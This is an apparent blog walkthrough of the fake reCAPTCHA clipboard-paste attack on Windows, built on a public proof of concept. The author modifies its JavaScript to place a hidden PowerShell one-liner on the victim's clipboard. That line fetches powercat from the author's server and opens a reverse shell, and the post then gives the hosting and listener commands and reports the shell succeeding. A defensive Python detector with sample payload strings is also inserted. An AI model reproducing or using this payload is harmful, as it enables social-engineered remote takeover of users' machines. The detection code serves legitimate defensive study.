Hacking Windows with Fake Captchas

In recent weeks, security researchers at several companies have spotted a new type of phishing attack built around those pesky reCAPTCHA prompts.

reCAPTCHA is a security tool designed to tell human users apart from automated bots on websites. Attackers in the wild, however, have been imitating it to social-engineer victims into running malicious PowerShell commands on their own systems. Let’s see how it works in detail.

How Fake Captchas Work:

  • First, the victim is shown a fake reCAPTCHA with the classic “I am not a robot” checkbox.

  • Once the user clicks it, another pop-up appears on the screen showing some “verification steps”.

  • The verification steps tell the user to open the Windows Run box with “Windows+R”, press “CTRL+V” to paste a string that the page has silently placed on the clipboard, and hit “Enter”. Once the target hits “Enter”, it’s GAME OVER !!!

  • The pasted, base64-encoded PowerShell string then downloads an HTA (HTML Application) file from a remote server and executes infostealer malware such as LummaStealer on the target.

Performing the Attack:

Downloading and Analyzing the POC

To perform this attack, we will use the POC published by John Hammond on his GitHub.

John’s POC: https://github.com/JohnHammond/recaptcha-phish

  • We will first download the POC on our Kali machine. It contains two files: index.html and recaptcha-verify.

git clone https://github.com/JohnHammond/recaptcha-phish.git

cd recaptcha-phish

ls

  • Let’s look into the index.html file. I will use mousepad; use any editor of your choice.

mousepad index.html

  • Alright, so as we can see, the stageClipboard function takes two arguments, commandToRun and VerificationID. It then initializes a few variables: suffix, ploy, end and textToCopy. The first three belong to the social-engineering part, disguising the command as some kind of verification ID. The textToCopy variable concatenates all of them, including commandToRun, and passes the result to the setClipboardCopyData function.

  • Next, the function showVerifyWindow does something interesting. It has a variable named htaPath that takes the server’s address from the “window.location.origin” JS property and appends the recaptcha-verify HTA file included with the POC. The commandToRun variable then runs mshta with that htaPath, so once the payload has executed on the target system the HTA keeps up the social-engineering facade and pops up the Calculator app.

Making changes to POC

  • Now, to suit our goal of getting reverse shell access to the target, I have made some changes to the index.html file. First, I added a revshell variable inside the stageClipboard function. It holds a PowerShell one-liner that downloads the powercat reverse shell script onto the target and then executes it to give us shell access on our port 6666.

  • For those of you who don’t know what powercat is: Powercat is a PowerShell tool that simplifies network communication tasks, similar to the well-known utility Netcat but designed specifically for Windows environments.

Powercat: https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

function stageClipboard(commandToRun, verification_id){
    // Added for this write-up: a PowerShell one-liner that fetches powercat from our web server
    // and connects back to our listener on port 6666 before the original command runs
    const revshell = "powershell.exe -ep bypass -W hidden IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.29.160:8080/powercat.ps1');powercat -c 192.168.29.160 -p 6666 -e powershell; "
    // suffix, ploy and end only dress the pasted command up as a harmless "verification ID"
    const suffix = " # "
    const ploy = "✅ ''I am not a robot: "
    const end = "''"
    const textToCopy = revshell + commandToRun + suffix + ploy + verification_id + end

    // The whole string is placed on the victim's clipboard for the Win+R / CTRL+V step
    setClipboardCopyData(textToCopy);
}
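As an added, defender-side example that is not part of the original post or John Hammond’s POC: a Python script that checks the Run dialog’s history (the RunMRU registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which records what was typed or pasted into Win+R) and any process command line for the traits described in the steps above and in the modified stageClipboard: the “I am not a robot” comment ploy, mshta fetching a remote HTA, and a hidden PowerShell download-and-run, including the base64-encoded form. The sample RunMRU entries and the example.invalid host are constructed.

```python
import base64
import re

# Traits of the fake-captcha flow described above: the pasted string ends in a bogus "I am not a
# robot" comment, and the payload is mshta pulling a remote HTA and/or a hidden PowerShell download.
INDICATORS = {
    "fake captcha ploy comment": re.compile(r"#.*I am not a robot", re.IGNORECASE),
    "mshta fetching remote HTA": re.compile(r"\bmshta(?:\.exe)?\b.*\bhttps?://", re.IGNORECASE),
    "hidden PowerShell window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "PowerShell download-and-execute": re.compile(r"\b(?:IEX|Invoke-Expression)\b.*DownloadString", re.IGNORECASE),
}
PS_ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def decode_encoded_command(cmd):
    """Plaintext of a 'powershell -enc <base64>' argument (UTF-16LE), or None if absent/invalid."""
    m = PS_ENCODED.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_command(cmd):
    """Names of the indicators matched by one Run-box entry or process command line."""
    reasons = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:  # look inside an encoded command as well
        reasons.append("base64 EncodedCommand")
        reasons += ["decoded: " + r for r in classify_command(decoded)]
    return reasons

def scan_run_mru(values):
    """Return (command, reasons) for suspicious RunMRU entries; values are '<command>\\1', MRUList orders them."""
    hits = []
    for name in values.get("MRUList", ""):  # most recent entry first
        cmd = values.get(name, "").removesuffix("\\1")
        reasons = classify_command(cmd)
        if reasons:
            hits.append((cmd, reasons))
    return hits

# Constructed sample data (not from a real host); example.invalid is a placeholder host.
SAMPLE_RUN_MRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta http://example.invalid/recaptcha-verify # \u2705 ''I am not a robot: 7811''\\1",
    "c": "powershell -ep bypass -W hidden IEX(New-Object System.Net.WebClient).DownloadString('http://example.invalid/powercat.ps1')\\1",
}
SAMPLE_ENCODED = "powershell -enc " + base64.b64encode("mshta http://example.invalid/v.hta".encode("utf-16-le")).decode()
```

On a live host the same values can be read with winreg or exported with reg.exe and fed to scan_run_mru; Sysmon process-creation command lines can be passed straight to classify_command.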

Burning down the Windows

  • So, at last we are ready with our modified POC. Let’s spawn a web server on port 8000 using Python to host our index.html file.

python3 -m http.server

  • Spawn another server on port 8080 to host our powercat.ps1 script.

python3 -m http.server 8080

  • Next, get our netcat listener ready on port 6666 for incoming connections.

nc -lvnp 6666

  • Now, coming to the target, we have a Windows 10 virtual machine here. Let’s open up Google Chrome on it and browse to our web server running on port 8000. We get a fake Captcha page!

  • Now, if I click to verify myself, I am prompted with some verification steps. First, I have to open the Windows Run dialog box using “Win+R” and then press “CTRL+V”, and here we can see the “I am not a Robot” text with a Verification ID. I also made small changes to this set of strings because of the length limit of the Windows Run box. Now, if I hit Enter: BOOM! We get a connection at our netcat listener. That means we have successfully hacked the target.


Conclusion:

In conclusion, this demonstration of hacking Windows with fake captchas, in particular through the proof of concept (POC) published by John Hammond, highlights an amusing yet concerning weakness in user behaviour and security awareness. The attack exploits users’ tendency to trust familiar interfaces, even when they are fake. It may seem silly that people can be tricked by something as simple as a fake captcha, but it underscores the importance of vigilance in our digital interactions. To protect against such attacks, users should adopt several best practices:

  • Verify URLs: Always check the URL of the website you are interacting with. Ensure it’s legitimate and secure (look for HTTPS).

  • Educate Yourself: Understanding common phishing tactics can help you recognize suspicious activities.

  • Use Security Tools: Employ browser extensions and security software that can detect and warn against phishing attempts.

  • Report Suspicious Activity: If you encounter a fake captcha or other suspicious elements online, report them to the appropriate authorities or platforms.

Ultimately, while hacking through fake captchas may seem trivial or even humorous, it is a reminder of the ongoing battle between security measures and user awareness. By staying informed and cautious, we can better defend ourselves against these seemingly silly yet potentially harmful attacks. On that note, I will take your leave; till then, “Keep Hacking”.
